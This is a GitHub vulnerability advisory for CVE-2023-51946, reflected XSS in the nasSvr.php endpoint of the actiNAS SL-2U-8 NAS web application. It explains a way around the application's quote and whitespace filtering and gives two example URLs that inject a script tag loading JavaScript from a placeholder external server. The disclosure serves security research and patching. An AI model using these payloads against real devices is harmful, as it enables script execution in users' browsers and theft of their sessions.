Skip to content

Latest commit

 

History

History
33 lines (19 loc) · 1.66 KB

README.md

File metadata and controls

33 lines (19 loc) · 1.66 KB

CVE-2023-51946

Description

Multiple reflected cross-site scripting (XSS) vulnerabilities in nasSvr.php in actidata actiNAS-SL-2U-8 3.2.03-SP1 allow remote attackers to inject arbitrary web script or HTML.

Affected systems

The web application version 3.2.03-SP1 from actiNAS Plus SL 2U-8 RDX.

Product link: https://www.actidata.com/index.php/de-de/actinas-plus-sl-2u-8-rdx

Author

Eduard Agavriloae

Details

The web application through the endpoint /nasSvr.php is prone to reflected XSS from two query parameters: func and op. In both parameters XSS payloads can be injected that will be rendered on the client inside a message similar to the next ones depending on what parameter was used:

  • Option <payload> not match in Account Manager!
  • func:<payload> not match in nasSvr!

If the payload has string delimiters such as ' or " and whitespaces between the string delimiters, then the web application will modify the payload by adding the string delimiters before and after the whitespaces, affecting the payload's execution. However, this can be easily bypassed by directly injecting a script HTML tag with an arbitrary source, essentially allowing you to execute without restrictions JavaScript code. Alternatively, you can just use payloads without whitespaces between string delimiters.

Example payloads:

  • /nasSvr.php?func=accountMgr&op=%3Cscript%20src=https://your-web-server.com/payload.js%3E%3C/script%3E
  • /nasSvr.php?func=%3Cscript%20src=https://your-web-server.com/payload.js%3E%3C/script%3E

Other versions

My feeling is that other versions are affected as well, but I didn't found other instances of this product in order to validate.